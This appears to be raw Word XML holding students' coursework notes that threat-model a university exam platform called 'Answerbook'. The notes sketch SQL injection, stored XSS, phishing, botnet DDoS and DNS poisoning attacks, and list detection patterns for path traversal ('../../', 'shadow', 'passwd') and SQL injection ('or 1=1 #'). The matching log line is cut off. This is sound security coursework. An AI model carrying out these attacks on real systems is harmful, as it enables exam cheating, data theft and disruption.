      <w:r w:rsidRPr="499DF1D5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Question 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="28AD3D80" w:rsidP="499DF1D5" w:rsidRDefault="28AD3D80" w14:paraId="14AB5ED1" w14:textId="6833EFF0">
      <w:r w:rsidRPr="499DF1D5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ai)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="28AD3D80" w:rsidP="75FE2C14" w:rsidRDefault="28AD3D80" w14:paraId="2A9D1B17" w14:textId="63349D70">
      <w:r w:rsidRPr="75FE2C14">
        <w:t>Information discl</w:t>
      </w:r>
      <w:r w:rsidRPr="75FE2C14" w:rsidR="1F90717F">
        <w:t>osure: using an SQL injection to steal answers belonging to another student.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="51EC5C0A" w:rsidP="499DF1D5" w:rsidRDefault="51EC5C0A" w14:paraId="4B248ED0" w14:textId="5A49BF4A">
      <w:r>
        <w:t>Tampering: using an SQL injection to delete all answers belonging to another student (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>e.g.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> for revenge) just seconds before the end of an exam.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1CDA3BE2" w:rsidP="499DF1D5" w:rsidRDefault="1CDA3BE2" w14:paraId="5CA96849" w14:textId="476C0D42">
      <w:r>
        <w:t>Tampering (?): using an SQL injection to change questions displayed to students.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1CDA3BE2" w:rsidP="499DF1D5" w:rsidRDefault="1CDA3BE2" w14:paraId="0AA17F89" w14:textId="37269EC6" w14:noSpellErr="1">
      <w:r w:rsidR="4629CD52">
        <w:rPr/>
        <w:t>Any other ideas not using an SQL injection?</w:t>
      </w:r>
      <w:commentRangeStart w:id="636906722"/>
      <w:commentRangeEnd w:id="636906722"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:commentReference w:id="636906722"/>
      </w:r>
      <w:commentRangeStart w:id="1309144763"/>
      <w:commentRangeEnd w:id="1309144763"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:commentReference w:id="1309144763"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="34495CE6" w:rsidP="75FE2C14" w:rsidRDefault="34495CE6" w14:paraId="756A7A2A" w14:textId="0637F2A6">
      <w:r>
        <w:t xml:space="preserve">Ye, here: Stored-XSS / File Upload (polyglot images) - screw the lecturer when they </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>open up</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the image / user data (tamper with what they see, delete files)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="28AD3D80" w:rsidP="499DF1D5" w:rsidRDefault="28AD3D80" w14:paraId="4567EABA" w14:textId="4C541AF4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="499DF1D5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Aii</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="499DF1D5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="28AD3D80" w:rsidP="499DF1D5" w:rsidRDefault="31AED68C" w14:paraId="0CEE9B95" w14:textId="731A932A">
      <w:r w:rsidRPr="78481107">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Denial of service:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> using a botnet to perform a DDoS attack on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Answerbook</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in order to take down its servers and disrupt </w:t>
      </w:r>
      <w:r w:rsidR="3BDA4FE7">
        <w:t xml:space="preserve">an </w:t>
      </w:r>
      <w:r>
        <w:t>exam. You could do this by renting a botnet on the internet which aren’t too expensive.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="27E9B0D3" w:rsidP="75FE2C14" w:rsidRDefault="27E9B0D3" w14:paraId="5D61E7E4" w14:textId="5EB9C571">
      <w:r w:rsidRPr="75FE2C14">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Tampering </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">– Somehow find a way to do a stored XSS on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Answerbook</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> or exams.doc.uc.ac.uk to mess with other students...?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="690B7B38" w:rsidP="75FE2C14" w:rsidRDefault="3ADEEC2F" w14:paraId="2A40B1ED" w14:textId="10BE8692">
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Spoofing </w:t>
      </w:r>
      <w:r w:rsidR="04EAF177">
        <w:t>- Could</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> perform spear fishing on students by spreading exclusive exam solution</w:t>
      </w:r>
      <w:r w:rsidR="7A2FFEAA">
        <w:t xml:space="preserve">s </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(who in the right mind wouldn’t click on that) </w:t>
      </w:r>
      <w:r w:rsidR="7026EFBE">
        <w:t xml:space="preserve">or email students as Sergio with a fake </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="7026EFBE">
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="3EAC92FA">
        <w:t>nswerbook</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="3EAC92FA">
        <w:t xml:space="preserve"> link</w:t>
      </w:r>
      <w:r w:rsidR="7026EFBE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>and gather login information that could then be used to login i</w:t>
      </w:r>
      <w:r w:rsidR="25275AD9">
        <w:t xml:space="preserve">nto their account and see the answers. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="690B7B38" w:rsidP="75FE2C14" w:rsidRDefault="1478C56E" w14:paraId="1025F367" w14:textId="7E032055">
      <w:commentRangeStart w:id="1955426794"/>
      <w:r w:rsidRPr="14E58255" w:rsidR="153E06F9">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">Tampering </w:t>
      </w:r>
      <w:r w:rsidR="153E06F9">
        <w:rPr/>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="65DB01CC">
        <w:rPr/>
        <w:t xml:space="preserve">DNS hijacking – Would be quite far-fetched but you could for example poison DNS from some </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="65DB01CC">
        <w:rPr/>
        <w:t>uni</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="65DB01CC">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0AC5D66C">
        <w:rPr/>
        <w:t>accommodations</w:t>
      </w:r>
      <w:r w:rsidR="65DB01CC">
        <w:rPr/>
        <w:t xml:space="preserve"> to redirect to other website. Not very con</w:t>
      </w:r>
      <w:r w:rsidR="667CCCB6">
        <w:rPr/>
        <w:t>vinced about that one though</w:t>
      </w:r>
      <w:commentRangeEnd w:id="1955426794"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:commentReference w:id="1955426794"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="218D6D06" w:rsidP="06C6DA00" w:rsidRDefault="218D6D06" w14:paraId="4E6C6270" w14:textId="189845B8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Repudation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">: tell lecturer you could not access </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>answerbook</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">, unable to take exam. Objective: avoid taking exam. How: deny ability to access/login/technical issues which </w:t>
      </w:r>
      <w:r w:rsidRPr="133B6B4D" w:rsidR="274D5166">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">weren’t </w:t>
      </w:r>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>your fault.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="218D6D06" w:rsidP="06C6DA00" w:rsidRDefault="218D6D06" w14:paraId="2FD86607" w14:textId="2DC8115E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Tampering</w:t>
      </w:r>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">: change answers after the exam time is over. Objective: achieve a higher grade. How: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> attacks (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>e.g.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> change browser clock time provided to JS).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="15C7A233" w:rsidP="499DF1D5" w:rsidRDefault="1F3B863C" w14:paraId="5798D6D6" w14:textId="61A25F5D">
      <w:r>
        <w:t>Any other ideas?</w:t>
      </w:r>
      <w:r w:rsidR="15C7A233">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="795A4E65" w:rsidP="06C6DA00" w:rsidRDefault="795A4E65" w14:paraId="0639FC61" w14:textId="715FB034">
      <w:r>
        <w:t xml:space="preserve">b) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="795A4E65" w:rsidP="06C6DA00" w:rsidRDefault="795A4E65" w14:paraId="47E28C2C" w14:textId="2DD60C3B">
      <w:r>
        <w:t>Yes:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="795A4E65" w:rsidP="06C6DA00" w:rsidRDefault="42CA154D" w14:paraId="57A8B031" w14:textId="517BD2D0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75A8A26A" wp14:editId="5D209B02">
            <wp:extent cx="3333750" cy="171450"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1051397525" name="Picture 1051397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397525"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3333750" cy="171450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="73BEF624" w:rsidP="06C6DA00" w:rsidRDefault="73BEF624" w14:paraId="43F8F94C" w14:textId="4DF09811">
      <w:r>
        <w:t>This will be required to be sent from any form submission.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="795A4E65" w:rsidP="06C6DA00" w:rsidRDefault="795A4E65" w14:paraId="279764A0" w14:textId="7BDB39BF">
      <w:r>
        <w:t>b) ii.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="795A4E65" w:rsidP="06C6DA00" w:rsidRDefault="42CA154D" w14:paraId="46A637E5" w14:textId="55BAF504">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AB79ED4" wp14:editId="12BF8E37">
            <wp:extent cx="5143500" cy="535781"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="129496473" name="Picture 129496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96473"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5143500" cy="535781"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="795A4E65">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="795A4E65" w:rsidP="06C6DA00" w:rsidRDefault="42CA154D" w14:paraId="6381A97C" w14:textId="0EF551B1">
      <w:r>
        <w:t>CSP: prevents unauthorized scripts and content running in page.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="795A4E65" w:rsidP="06C6DA00" w:rsidRDefault="42CA154D" w14:paraId="6C8E3817" w14:textId="16847E86">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="113A99C1" wp14:editId="74FD651B">
            <wp:extent cx="1400175" cy="247650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="512792656" name="Picture 51279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792656"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1400175" cy="247650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="795A4E65" w:rsidP="06C6DA00" w:rsidRDefault="19DF64ED" w14:paraId="6E9F8001" w14:textId="2F935814">
      <w:r>
        <w:t xml:space="preserve">XFO: prevents page becoming </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>E.g.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> embed </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to steal answers (as they’re stored on server). Clickjacking to make you fail.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="78481107" w:rsidP="78481107" w:rsidRDefault="78481107" w14:paraId="1F047826" w14:textId="067E7EFB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0769E73A" wp14:editId="1359E6E6">
            <wp:extent cx="1162050" cy="257175"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2010793591" name="Picture 2010793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162050" cy="257175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="78481107" w:rsidP="78481107" w:rsidRDefault="78481107" w14:paraId="2CB66963" w14:textId="48849238">
      <w:r w:rsidR="700FAA50">
        <w:rPr/>
        <w:t>Server only reveals minimal information (only the name, “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="700FAA50">
        <w:rPr/>
        <w:t>gunicon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="700FAA50">
        <w:rPr/>
        <w:t>”) about the http server framework; no numeric version specified so attacker cannot research vulnerabilities by version</w:t>
      </w:r>
      <w:commentRangeStart w:id="131924722"/>
      <w:r w:rsidR="700FAA50">
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
      <w:commentRangeEnd w:id="131924722"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:commentReference w:id="131924722"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="75FF2941" w:rsidP="75FE2C14" w:rsidRDefault="1A90FA4B" w14:paraId="409D8E66" w14:textId="01886919">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Biii</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="75FF2941" w:rsidP="75FE2C14" w:rsidRDefault="054008D9" w14:paraId="043287AC" w14:textId="054F7E19">
      <w:r>
        <w:t>Harden CSP e.g. “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>cdn.jsdelivr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>” is an allowed domain, but DNS hijacking could allow for XSS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="75FF2941" w:rsidP="75FE2C14" w:rsidRDefault="054008D9" w14:paraId="69A6CB8C" w14:textId="1DE4EC53">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>i.e.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="1A90FA4B">
        <w:t>Content-Security-Policy: default-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="1A90FA4B">
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="1A90FA4B">
        <w:t xml:space="preserve"> ‘self’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="353C40D9" w:rsidP="133B6B4D" w:rsidRDefault="353C40D9" w14:paraId="79A002A3" w14:textId="02D73FC4">
      <w:r>
        <w:t xml:space="preserve">Don’t do answer reflection </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>i.e.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> autosaving answers from textbox. Make it more like a form, where when you’re finished you click submit, and only at that point, does a request go to server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="55E5F3CB" w:rsidP="06C6DA00" w:rsidRDefault="55E5F3CB" w14:paraId="648D92D2" w14:textId="0A0F5BF2">
      <w:r>
        <w:t xml:space="preserve">X-XSS-Protection: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>1;</w:t>
      </w:r>
      <w:r w:rsidR="2C4D9089">
        <w:t xml:space="preserve">  (</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="2C4D9089">
        <w:t>although deprecated)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4CC85DAB" w:rsidRDefault="4CC85DAB" w14:paraId="66CDBD85" w14:textId="239E4048">
      <w:r w:rsidRPr="75FE2C14">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Question 3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7BF59C70" w:rsidP="61D57FC2" w:rsidRDefault="21F6E7FC" w14:paraId="7387E211" w14:textId="74546AFC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ai)</w:t>
      </w:r>
      <w:commentRangeStart w:id="2"/>
      <w:commentRangeStart w:id="3"/>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="61D57FC2">
        <w:rPr>
          <w:strike/>
        </w:rPr>
        <w:t>file inclusion</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="61D57FC2" w:rsidR="14BBC217">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>path traversal</w:t>
      </w:r>
      <w:r w:rsidR="14BBC217">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="79EA9B87">
        <w:t>-&gt; can be detected by pattern matching on the URL (e.g. detecting</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="79EA9B87">
        <w:t xml:space="preserve"> ..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="79EA9B87">
        <w:t>/../) and using blacklist/</w:t>
      </w:r>
      <w:r w:rsidR="3E36CF6C">
        <w:t>whitelist of words allowed/banned (e.g. shadow, passwd)</w:t>
      </w:r>
      <w:commentRangeEnd w:id="2"/>
      <w:r w:rsidR="7BF59C70">
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:commentReference w:id="2"/>
      </w:r>
      <w:commentRangeEnd w:id="3"/>
      <w:r w:rsidR="7BF59C70">
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:commentReference w:id="3"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="777778C5" w:rsidP="75FE2C14" w:rsidRDefault="777778C5" w14:paraId="77FA4559" w14:textId="32DEB432">
      <w:r>
        <w:t>SQL injection -&gt; can be detected in the queries again using expression matching. We expect inputs like (or 1=1 # to be malicious and those can easily be detected)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="042C3534" w:rsidP="75FE2C14" w:rsidRDefault="042C3534" w14:paraId="425D8518" w14:textId="5700D073">
      <w:r>
        <w:t xml:space="preserve">Stored XSS -&gt; </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>similar to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> previous one. Can be detected via pattern </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>matching</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="042C3534" w:rsidP="75FE2C14" w:rsidRDefault="042C3534" w14:paraId="02F7C503" w14:textId="1931ACC5">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="75FE2C14">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Aii</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="75FE2C14">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="042C3534" w:rsidP="75FE2C14" w:rsidRDefault="40497DF2" w14:paraId="24C3F435" w14:textId="23D4E341">
      <w:r>
        <w:t xml:space="preserve">clear attempt to detect </w:t>
      </w:r>
      <w:r w:rsidRPr="61D57FC2" w:rsidR="4DAC8689">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">path traversal </w:t>
      </w:r>
      <w:r w:rsidR="625422A4">
        <w:t>vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="29767FC1" w:rsidP="75FE2C14" w:rsidRDefault="29767FC1" w14:paraId="10444D8B" w14:textId="131A2618">
      <w:r>
        <w:t xml:space="preserve">E.g. </w:t>
      </w:r>
      <w:r w:rsidRPr="75FE2C14">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="darkBlue"/>
        </w:rPr>
        <w:t>5.62.34.31 - - [24/Oct/2018:12:15:05 +0100] "GET /~</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="75FE2C14">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="darkBlue"/>
        </w:rPr>
        <w:t>ANON/previous/Robotics/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="75FE2C14">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="darkBlue"/>
        </w:rPr>
        <w:t>index.cgi?page</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="75FE2C14">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="darkBlue"/>
        </w:rPr>
        <w:t>=../../../</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="75FE2C14">
        <w:rPr>
